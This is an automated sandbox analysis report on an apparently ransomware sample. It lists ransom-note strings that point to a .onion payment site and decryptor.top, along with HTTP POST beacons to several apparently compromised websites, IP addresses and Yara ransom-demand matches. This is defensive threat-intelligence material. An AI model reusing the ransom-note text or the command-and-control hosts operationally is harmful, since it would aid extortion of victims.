              Source: 985drm9-readme.txt28.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt10.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt51.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt39.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt42.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt61.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt30.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt47.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt31.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt27.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt59.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt60.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt36.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt64.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt43.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt3.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt63.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt1.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt62.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt11.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt54.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt4.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt34.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt22.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt35.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt48.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt38.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt23.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt19.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt21.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt8.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt16.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt2.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt6.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt57.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt14.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt66.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt25.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt58.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt56.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt26.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt50.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt46.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt7.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt5.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt67.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt24.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt55.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt18.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt40.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt65.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt49.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt44.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt32.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt15.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt52.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt41.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt37.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt0.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt12.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt68.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt9.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt29.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt20.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt45.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt33.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: 985drm9-readme.txt53.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: unknownHTTP traffic detected: POST /admin/graphic/ervzot.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: patriotcleaning.net
              Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /data/image/oe.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: p-ride.live
              Source: global trafficHTTP traffic detected: POST /static/assets/hbhezx.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: avtoboss163.ru
              Source: global trafficHTTP traffic detected: POST /admin/pics/hdxsmg.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: brownswoodblog.com
              Source: global trafficHTTP traffic detected: POST /admin/graphic/ervzot.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: patriotcleaning.net
              Source: global trafficHTTP traffic detected: POST /news/game/bvprbb.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: so-sage.fr
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginxdate: Thu, 16 Nov 2023 23:51:58 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedvary: Accept-Encodingx-unique-id: 9C9231A8:A25E_B920398E:01BB_6556AB1D3AB377C082set-cookie: stats=1; expires=Thu, 23-Nov-2023 23:51:58 GMT; Max-Age=604800; path=/; domain=avtoboss163.rustrict-transport-security: max-age=10x-reason: no_rendervary: Cookiepragma: no-cachelast-modified: Thu, 16 Nov 2023 21:49:18 GMTcache-control: must-revalidate, max-age=0expires: Thu, 16 Nov 2023 21:49:18 GMTx-xss-protection: 1; mode=blockconnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.6Date: Thu, 16 Nov 2023 23:52:01 GMTContent-Type: text/htmlContent-Length: 150Connection: closeVary: Accept-EncodingSet-Cookie: _uid=CgE5FmVWqyE3lQA/JZtvAg==; expires=Fri, 17-Nov-23 23:52:01 GMT; path=/Strict-Transport-Security: max-age=31536000
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 16 Nov 2023 23:52:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.so-sage.fr/wp-json/>; rel="https://api.w.org/"
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
              Source: RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr, 985drm9-readme.txt30.0.dr, 985drm9-readme.txt47.0.dr, 985drm9-readme.txt31.0.drString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brownswoodblog.com/
              Source: RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://decryptor.top/
              Source: RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr, 985drm9-readme.txt30.0.dr, 985drm9-readme.txt47.0.dr, 985drm9-readme.txt31.0.drString found in binary or memory: http://decryptor.top/45C1E9BA4D645606
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avtoboss163.ru/
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avtoboss163.ru:443/static/assets/hbhezx.pngources
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brownswoodblog.com/
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brownswoodblog.com/admin/pics/hdxsmg.gifmsu
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brownswoodblog.com:443/admin/pics/hdxsmg.gifData
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p-ride.live:443/data/image/oe.gifv1.0
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://patriotcleaning.net/
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://patriotcleaning.net/W
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://patriotcleaning.net/admin/graphic/ervzot.jpg
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://patriotcleaning.net:443/admin/graphic/ervzot.jpgs
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rarefoods.ro/
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rarefoods.ro/admin/pics/wcyshd.png
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rarefoods.ro/admin/pics/wcyshd.png1
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rarefoods.ro/r
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rarefoods.ro:443/admin/pics/wcyshd.pngebResources
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://so-sage.fr/
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://so-sage.fr/1
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://so-sage.fr/Y
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://so-sage.fr/news/game/bvprbb.png
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://so-sage.fr:443/news/game/bvprbb.pngt
              Source: RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.drString found in binary or memory: https://torproject.org/
              Source: unknownHTTP traffic detected: POST /data/image/oe.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: p-ride.live
              Source: unknownDNS traffic detected: queries for: p-ride.live
              Source: unknownHTTPS traffic detected: 172.67.132.175:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.32.57.142:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.219.93:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 138.197.111.104:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 137.74.231.3:443 -> 192.168.2.4:49739 version: TLS 1.2

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: Yara matchFile source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR
